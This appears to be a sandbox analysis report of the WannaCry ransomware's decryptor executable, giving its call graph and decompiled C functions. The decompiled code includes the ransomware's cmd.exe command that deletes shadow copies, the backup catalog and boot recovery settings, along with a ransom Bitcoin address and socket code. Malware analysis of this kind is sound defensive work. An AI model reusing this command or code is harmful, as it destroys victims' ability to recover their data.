40dbf0 free 5334 40c173 5333->5334 5334->5314 5336 40c144 5335->5336 5337 40c17b 5335->5337 5338 40c154 5336->5338 5339 40c148 SendMessageA 5336->5339 5340 40c18b 5337->5340 5341 40c17f SendMessageA 5337->5341 5342 40dbf0 free 5338->5342 5339->5338 5343 40c1b4 5340->5343 5344 40c1e8 5340->5344 5341->5340 5342->5334 5345 40c1c4 5343->5345 5346 40c1b8 SendMessageA 5343->5346 5344->5347 5348 40c1f5 SendMessageA 5344->5348 5349 40dbf0 free 5345->5349 5346->5345 5347->5333 5348->5347 5349->5334 5351 4076d9 time 5350->5351 5352 4076d7 5351->5352 5352->5351 5353 407771 sprintf 5352->5353 5354 405180 4 API calls 5352->5354 5355 407842 SendMessageA SendMessageA #540 5352->5355 5353->5352 5354->5352 5356 407894 5355->5356 5357 4078aa _ftol #2818 #2818 5356->5357 5358 4078db #2818 #2818 5356->5358 5359 407911 #3092 #6199 5357->5359 5358->5359 5360 407990 #800 5359->5360 5361 407940 5359->5361 5360->4758 5361->5360 5362 407952 InvalidateRect 5361->5362 5363 405920 2 API calls 5362->5363 5364 407978 5363->5364 5365 405920 2 API calls 5364->5365 5365->5360 5366->4784 5367->4786 5368->4788 5392 4044c0 5369->5392 5372 404210 #858 #800 5372->4792 5396 405950 InvalidateRect 5373->5396 5375 40592d 5397 405970 InvalidateRect 5375->5397 5377 40593e 5378 405860 5377->5378 5379 405872 5378->5379 5380 405875 GetClientRect #6197 5378->5380 5379->5380 5380->4797 5382 4058d2 5381->5382 5383 4058d5 GetClientRect #6197 5381->5383 5382->5383 5383->4799 5385 4051f8 5384->5385 5386 40519e #860 5384->5386 5385->4801 5387 4051b1 5386->5387 5388 4051d1 RedrawWindow 5387->5388 5389 4051ea InvalidateRect 5387->5389 5388->4801 5389->5385 5390->4811 5391->4813 5393 4044f8 GetObjectA CreateFontIndirectA #1641 5392->5393 5394 4044ce GetParent #2864 SendMessageA #2860 5392->5394 5395 40427a #2818 #535 5393->5395 5394->5393 5394->5395 5395->5372 5396->5375 5397->5377 5399 406b88 #537 #924 sprintf #800 #800 5398->5399 5400 406bda 5398->5400 5399->5400 5403 406cf0 5400->5403 5402 406be6 #800 5402->4822 5404 406d16 5403->5404 5405 406d19 SendMessageA #353 SendMessageA #1979 5403->5405 5404->5405 5408 406dc0 SendMessageA #823 5405->5408 5409 406e00 SendMessageA 5408->5409 5410 406d7b #665 5408->5410 5412 406ed2 #825 5409->5412 5413 406e2f _strnicmp 5409->5413 5410->5402 5412->5410 5414 406e4b _strnicmp 5413->5414 5415 406e67 5413->5415 5414->5415 5415->5412 5415->5413 5416 406e87 SendMessageA #6136 5415->5416 5416->5415 6153 4019d0 EnableWindow 6154 4059d0 #561 6155 404dd0 6 API calls 6156 404e3b SendMessageA #3092 6155->6156 6158 404e60 SendMessageA #3092 6156->6158 6160 404e93 SendMessageA 6158->6160 6161 404e7f SendMessageA 6158->6161 6565 40dbd0 6566 40dbf0 free 6565->6566 6567 40dbd8 6566->6567 6568 40dbe8 6567->6568 6569 40dbdf #825 6567->6569 6569->6568 6379 4102d0 free 5930 4130d4 ??1type_info@@UAE 5931 4130e3 #825 5930->5931 5932 4130ea 5930->5932 5931->5932 5934 4068e0 5935 4068ef 5934->5935 5936 40691a #5280 5935->5936 5937 4068fc 5935->5937 5529 4043e0 #4284 #3874 #5277 5933 40a0e0 Escape 6380 4086e0 #470 GetClientRect SendMessageA #6734 #323 6381 408765 6380->6381 6382 408838 6381->6382 6385 4087bd CreateCompatibleDC #1640 6381->6385 6383 408885 #2754 6382->6383 6384 408869 FillRect 6382->6384 6386 408897 #2381 6383->6386 6384->6386 6412 409e70 CreateCompatibleBitmap #1641 6385->6412 6389 4088b4 6386->6389 6390 408a7d 6386->6390 6389->6390 6392 4088be #3797 6389->6392 6394 409f80 BitBlt 6390->6394 6408 408a5e 6390->6408 6391 408809 6413 409f10 6391->6413 6395 408901 _ftol 6392->6395 6397 408abe 6394->6397 6402 40895e _ftol 6395->6402 6404 40897e 6395->6404 6396 408817 #6194 6396->6382 6399 408ad5 #5785 6397->6399 6400 408ac6 #5785 6397->6400 6399->6408 6400->6408 6402->6404 6403 408afe #640 #755 6405 4089a7 FillRect 6404->6405 6406 4089b8 FillRect 6404->6406 6407 4089ca 6404->6407 6405->6407 6406->6407 6407->6408 6416 409f80 6407->6416 6419 409e20 #2414 6408->6419 6410 408a50 6411 409f10 2 API calls 6410->6411 6411->6408 6412->6391 6414 409f25 #5785 6413->6414 6415 409f18 #5785 6413->6415 6414->6396 6415->6396 6417 409f88 6416->6417 6418 409f8b BitBlt 6416->6418 6417->6418 6418->6410 6419->6403 6420 40c6e0 6421 40c722 #825 6420->6421 6422 40c6ef 6420->6422 6423 40c7b0 #825 6422->6423 6424 40c70d #825 6423->6424 6424->6422 6425 40c721 6424->6425 6425->6421 6583 40cfe0 6590 40d4c0 6583->6590 6585 40cffb 6586 40d4c0 4 API calls 6585->6586 6589 40d05e 6585->6589 6587 40d031 6586->6587 6588 40d4c0 4 API calls 6587->6588 6587->6589 6588->6589 6591 40d4d0 6590->6591 6592 40d4d9 6590->6592 6591->6585 6593 40d4e4 6592->6593 6594 40d4ee time 6592->6594 6593->6585 6595 40d575 6594->6595 6598 40d50a 6594->6598 6596 40d58a 6595->6596 6597 40d2b0 memmove 6595->6597 6596->6585 6597->6596 6598->6595 6599 40d569 time 6598->6599 6600 40d551 Sleep 6598->6600 6599->6595 6599->6598 6600->6598 6574 404fe0 #6334 6575 404ff4 #4853 6574->6575 6576 404ffb 6574->6576 6575->6576 6174 405df0 6179 405d90 #654 #765 6174->6179 6176 405df8 6177 405e08 6176->6177 6178 405dff #825 6176->6178 6178->6177 6179->6176 5938 4090f0 5939 409124 #540 #3874 5938->5939 5940 40971e 5938->5940 5941 409185 5939->5941 5942 40915e 5939->5942 5943 40919c _ftol 5941->5943 5944 40918e #860 5941->5944 5945 40917c 5942->5945 5948 40916e #860 5942->5948 5943->5945 5944->5943 5946 4091d5 SendMessageA #2860 5945->5946 5947 40970a #800 5945->5947 5949 409208 5946->5949 5947->5940 5948->5945 5964 409870 5949->5964 5951 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5953 409329 GetObjectA 5951->5953 5954 40935b GetTextExtentPoint32A 5951->5954 5953->5954 5956 40938b GetViewportOrgEx 5954->5956 5962 409411 5956->5962 5957 409630 #800 5958 409662 5957->5958 5959 40965a #6170 5957->5959 5960 409685 #2414 #2414 5958->5960 5961 40967d #5875 5958->5961 5959->5958 5960->5947 5961->5960 5962->5957 5965 409880 #2414 5964->5965 5965->5951 6426 406ef0 6427 406f03 #823 6426->6427 6428 406f6a 6426->6428 6427->6428 6429 406f25 SendMessageA ShellExecuteA #825 6427->6429 6429->6428 6163 4011f0 6164 40120b #5280 6163->6164 6165 4011fd 6163->6165 6165->6164 6166 401203 6165->6166 6167 4019f0 #765 6168 401a08 6167->6168 6169 4019ff #825 6167->6169 6169->6168 6170 4059f0 6171 4059f8 6170->6171 6172 405a08 6171->6172 6173 4059ff #825 6171->6173 6173->6172 6601 4067f0 IsIconic 6602 406808 7 API calls 6601->6602 6603 40689a #2379 6601->6603 6604 409ff0 ExtTextOutA 5967 405080 5972 4050a0 #800 #795 5967->5972 5969 405088 5970 405098 5969->5970 5971 40508f #825 5969->5971 5971->5970 5972->5969 5973 40d880 5976 40d0a0 time srand rand 5973->5976 5975 40d88f 5977 40d0e1 5976->5977 5978 40d0d3 rand 5976->5978 5977->5975 5978->5977 5978->5978 6180 403180 6185 4031a0 #2414 #2414 #616 #693 #641 6180->6185 6182 403188 6183 403198 6182->6183 6184 40318f #825 6182->6184 6184->6183 6185->6182 6186 405580 GetClientRect 6187 4055c7 7 API calls 6186->6187 6188 4057c9 6186->6188 6189 405666 6187->6189 6190 405669 #5785 CreateSolidBrush FillRect 6187->6190 6189->6190 6191 405770 6 API calls 6190->6191 6194 4056b2 6190->6194 6191->6188 6193 4056cd BitBlt 6193->6194 6194->6191 6194->6193 6195 408580 #609 6196 408598 6195->6196 6197 40858f #825 6195->6197 6197->6196 6431 404280 6432 404290 6431->6432 6433 40428b 6431->6433 6435 4042a0 #6663 6432->6435 6436 4042fd #2379 6432->6436 6434 404530 5 API calls 6433->6434 6434->6432 6437 4042b5 GetParent #2864 SendMessageA #2379 6435->6437 6438 4042e7 ShellExecuteA 6435->6438 6438->6436 6605 406380 6610 405e10 #2414 #2414 #2414 #2414 6605->6610 6607 406388 6608 406398 6607->6608 6609 40638f #825 6607->6609 6609->6608 6639 403f20 #2414 6610->6639 6612 405ed6 6640 403f20 #2414 6612->6640 6614 405eec 6641 403f20 #2414 6614->6641 6616 405f02 6642 403f20 #2414 6616->6642 6618 405f18 #2414 6643 403f20 #2414 6618->6643 6620 405f50 6644 403f20 #2414 6620->6644 6622 405f66 6645 403f20 #2414 6622->6645 6624 405f7c 6 API calls 6646 4050a0 #800 #795 6624->6646 6626 405ffe 6647 4050a0 #800 #795 6626->6647 6628 40600e 6648 404170 #2414 #800 #800 #795 6628->6648 6630 40601e 6649 404170 #2414 #800 #800 #795 6630->6649 6632 40602e 6650 404170 #2414 #800 #800 #795 6632->6650 6634 40603e 6651 404170 #2414 #800 #800 #795 6634->6651 6636 40604e #654 #765 6652 405d90 #654 #765 6636->6652 6638 406087 #609 #609 #616 #641 6638->6607 6639->6612 6640->6614 6641->6616 6642->6618 6643->6620 6644->6622 6645->6624 6646->6626 6647->6628 6648->6630 6649->6632 6650->6634 6651->6636 6652->6638 6653 409b80 6654 409b99 6653->6654 6655 409ba5 #2379 6654->6655 6656 409b9d 6654->6656 6657 40db80 recv 5519 407a90 5520 407bf4 #2385 5519->5520 5521 407abd 5519->5521 5521->5520 5528 404c40 #324 #540 #860 5521->5528 5523 407ae2 #2514 5524 407b72 #2414 #2414 #800 #641 5523->5524 5525 407afb 6 API calls 5523->5525 5524->5520 5526 4082c0 141 API calls 5525->5526 5527 407b61 #800 5526->5527 5527->5524 5528->5523 6198 404d90 #2370 #2289 5979 401091 5984 4010c0 #765 #641 5979->5984 5981 4010a8 5982 4010b8 5981->5982 5983 4010af #825 5981->5983 5983->5982 5984->5981 6439 414290 #825 6217 4085a0 #781 6218 4085b8 6217->6218 6219 4085af #825 6217->6219 6219->6218 5530 4063a0 15 API calls 6002 4034a0 6 API calls 6203 4035a0 SendMessageA 6204 4035e5 OpenClipboard 6203->6204 6205 4037e9 6203->6205 6204->6205 6206 4035f7 SendMessageA 6204->6206 6207 403681 GlobalAlloc 6206->6207 6208 40360f #3301 #924 #800 #800 SendMessageA 6206->6208 6209 4037e3 CloseClipboard 6207->6209 6210 40369b GlobalLock 6207->6210 6208->6207 6208->6208 6209->6205 6211 4036b6 SendMessageA 6210->6211 6212 4036aa GlobalFree 6210->6212 6213 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6211->6213 6214 4036d6 8 API calls 6211->6214 6212->6209 6213->6209 6216 4037bf 6214->6216 6216->6213 5985 4098a0 5990 4097e0 5985->5990 5987 4098a8 5988 4098b8 5987->5988 5989 4098af #825 5987->5989 5989->5988 5991 409815 5990->5991 5992 40981e #2414 #2414 5990->5992 5991->5992 5992->5987 5993 40a0a0 5994 40a0a8 5993->5994 5995 40a0ab GrayStringA 5993->5995 5994->5995 6450 40d6a0 htons socket 6451 40d6f3 bind 6450->6451 6452 40d814 6450->6452 6453 40d717 ioctlsocket 6451->6453 6454 40d809 6451->6454 6453->6454 6455 40d732 connect select 6453->6455 6454->6452 6456 40d80d closesocket 6454->6456 6455->6454 6457 40d78b __WSAFDIsSet 6455->6457 6456->6452 6458 40d79a __WSAFDIsSet 6457->6458 6459 40d7ac ioctlsocket setsockopt setsockopt 6457->6459 6458->6454 6458->6459 6446 40c6a0 6447 40c6aa 6446->6447 6449 40c6b8 6446->6449 6448 40c6be #825 6447->6448 6447->6449 6448->6449 6460 404aa3 6461 404ab1 6460->6461 6462 404aaa GlobalFree 6460->6462 6463 404ac0 6461->6463 6464 404ab9 CloseHandle 6461->6464 6462->6461 6464->6463 6003 407cb0 6006 4030e0 #324 #567 #567 6003->6006 6005 407cd6 6 API calls 6006->6005 6220 407db0 6227 401000 #324 #567 6220->6227 6222 407dd7 time 6223 407e09 #2514 6222->6223 6224 407dfe 6222->6224 6225 407e34 #765 #641 6223->6225 6226 407e28 time 6223->6226 6224->6223 6226->6225 6227->6222 6465 40ceb0 6466 40cebc 6465->6466 6467 4130bb 2 API calls 6466->6467 6468 40ceda 6467->6468 6470 4102b0 calloc

                                  Executed Functions

                                  Function 004064D0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 256stringwindowtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 71%
                                  			E004064D0(intOrPtr __ecx, void* __fp0) {
				char _v1032;
				char _v1424;
				void _v2256;
				void _v2456;
				void _v2707;
				char _v2708;
				intOrPtr _v2720;
				short _v2724;
				int _t48;
				int _t49;
				intOrPtr* _t50;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				short _t70;
				void* _t82;
				char* _t87;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t105;
				char _t122;
				intOrPtr _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				intOrPtr* _t140;
				intOrPtr* _t141;
				intOrPtr* _t142;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				void* _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t201;

				_t201 = __fp0;
				_t90 = __ecx; // executed
				L00412CB0(); // executed
				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
				_t48 = E00401C70(0);
				_t170 = _t169 + 4;
				if(_t48 == 0) {
					_t122 =  *0x421798; // 0x0
					_v2708 = _t122;
					memset( &_v2707, _t48, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetModuleFileNameA(0,  &_v2708, 0x104);
					_t87 = strrchr( &_v2708, 0x5c);
					_t170 = _t170 + 0x14;
					if(_t87 != 0) {
						_t89 = strrchr( &_v2708, 0x5c);
						_t170 = _t170 + 8;
						 *_t89 = 0;
					}
					SetCurrentDirectoryA( &_v2708);
				}
				_t167 = _t90 + 0x50c;
				_t49 = E00401A10(_t167, 1);
				_t171 = _t170 + 8;
				if(_t49 == 0) {
					memset(_t167, _t49, 0xc3 << 2);
					asm("repne scasb");
					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
					 *(_t90 + 0x588) = 0;
					__imp__time(0);
					 *(_t90 + 0x578) = _t82;
					E00401A10(_t167, 0);
					_t171 = _t171 + 0x30;
				}
				_t50 = E00402C40();
				__imp__#115(0x202,  &_v1424); // executed
				__imp____p___argc();
				if( *_t50 > 1) {
					_t168 = __imp____p___argv;
					_t140 = "fi";
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
					while(1) {
						_t98 =  *_t161;
						_t60 = _t98;
						if(_t98 !=  *_t140) {
							break;
						}
						if(_t60 == 0) {
							L12:
							_t60 = 0;
						} else {
							_t136 =  *((intOrPtr*)(_t161 + 1));
							_t22 = _t140 + 1; // 0x31000069
							_t60 = _t136;
							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710); // executed
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0); // executed
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
				 *0x42189c = _t90;
				return 1;
			}











































                                  0x004064d0
                                  0x004064da
                                  0x004064dc
                                  0x004064f9
                                  0x0040650d
                                  0x00406511
                                  0x00406516
                                  0x0040651b
                                  0x0040651d
                                  0x00406527
                                  0x00406530
                                  0x00406532
                                  0x00406540
                                  0x00406541
                                  0x00406554
                                  0x00406556
                                  0x0040655b
                                  0x00406564
                                  0x00406566
                                  0x00406569
                                  0x00406569
                                  0x00406571
                                  0x00406571
                                  0x00406577
                                  0x00406580
                                  0x00406585
                                  0x0040658a
                                  0x00406593
                                  0x0040659d
                                  0x004065ab
                                  0x004065bb
                                  0x004065bd
                                  0x004065c7
                                  0x004065d1
                                  0x004065da
                                  0x004065e0
                                  0x004065e5
                                  0x004065e5
                                  0x004065e8
                                  0x004065fa
                                  0x00406600
                                  0x00406609
                                  0x0040660f
                                  0x00406615
                                  0x0040661e
                                  0x00406621
                                  0x00406621
                                  0x00406625
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662d
                                  0x00406645
                                  0x00406645
                                  0x0040662f
                                  0x0040662f
                                  0x00406632
                                  0x00406635
                                  0x00406639
                                  0x00000000
                                  0x0040663b
                                  0x0040663b
                                  0x0040663e
                                  0x00406643
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406639
                                  0x0040664e
                                  0x00406650
                                  0x00406654
                                  0x0040665b
                                  0x0040665b
                                  0x00406661
                                  0x0040666a
                                  0x0040666d
                                  0x0040666d
                                  0x00406671
                                  0x00406675
                                  0x00000000
                                  0x00000000
                                  0x00406679
                                  0x00406691
                                  0x00406691
                                  0x0040667b
                                  0x0040667b
                                  0x0040667e
                                  0x00406681
                                  0x00406685
                                  0x00000000
                                  0x00406687
                                  0x00406687
                                  0x0040668a
                                  0x0040668f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040668f
                                  0x00406685
                                  0x0040669a
                                  0x0040669c
                                  0x004066a0
                                  0x004066a7
                                  0x004066a7
                                  0x004066ad
                                  0x004066b6
                                  0x004066b9
                                  0x004066b9
                                  0x004066bd
                                  0x004066c1
                                  0x00000000
                                  0x00000000
                                  0x004066c5
                                  0x004066dd
                                  0x004066dd
                                  0x004066c7
                                  0x004066c7
                                  0x004066ca
                                  0x004066cd
                                  0x004066d1
                                  0x00000000
                                  0x004066d3
                                  0x004066d3
                                  0x004066d6
                                  0x004066db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066db
                                  0x004066d1
                                  0x004066e6
                                  0x004066e8
                                  0x004066f3
                                  0x0040671a
                                  0x0040671c
                                  0x00406721
                                  0x00406727
                                  0x0040672b
                                  0x00406736
                                  0x0040675b
                                  0x0040675c
                                  0x0040676a
                                  0x0040677c
                                  0x00406738
                                  0x00406746
                                  0x0040674b
                                  0x00406786
                                  0x00406786
                                  0x00000000
                                  0x004066e8
                                  0x004066e1
                                  0x004066e3
                                  0x00000000
                                  0x004066e3
                                  0x00406695
                                  0x00406697
                                  0x00000000
                                  0x00406697
                                  0x00406649
                                  0x0040664b
                                  0x00000000
                                  0x0040664b
                                  0x0040678c
                                  0x0040678e
                                  0x0040679c
                                  0x004067a4
                                  0x004067ab
                                  0x004067c6
                                  0x004067d8
                                  0x004067dc
                                  0x004067ef

                                  APIs
                                  • #4710.MFC42 ref: 004064DC
                                  • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                  • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                    • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                    • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                    • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                    • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                    • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                  • strrchr.MSVCRT ref: 00406554
                                  • strrchr.MSVCRT ref: 00406564
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                  • time.MSVCRT ref: 004065D1
                                  • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                  • __p___argv.MSVCRT ref: 0040661A
                                  • ExitProcess.KERNEL32 ref: 0040665B
                                  • __p___argv.MSVCRT ref: 00406666
                                  • ExitProcess.KERNEL32 ref: 004066A7
                                  • __p___argv.MSVCRT ref: 004066B2
                                  • Sleep.KERNELBASE(00002710), ref: 004066F3
                                  • sprintf.MSVCRT ref: 0040676A
                                  • ExitProcess.KERNEL32 ref: 00406786
                                  • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                  • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                  Strings
                                  • Wana Decrypt0r 2.0, xrefs: 00406796
                                  • %s %s, xrefs: 00406764
                                  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                  • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                  • cmd.exe, xrefs: 0040671C
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                  • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                  • API String ID: 623806192-606506946
                                  • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                  • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                  • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
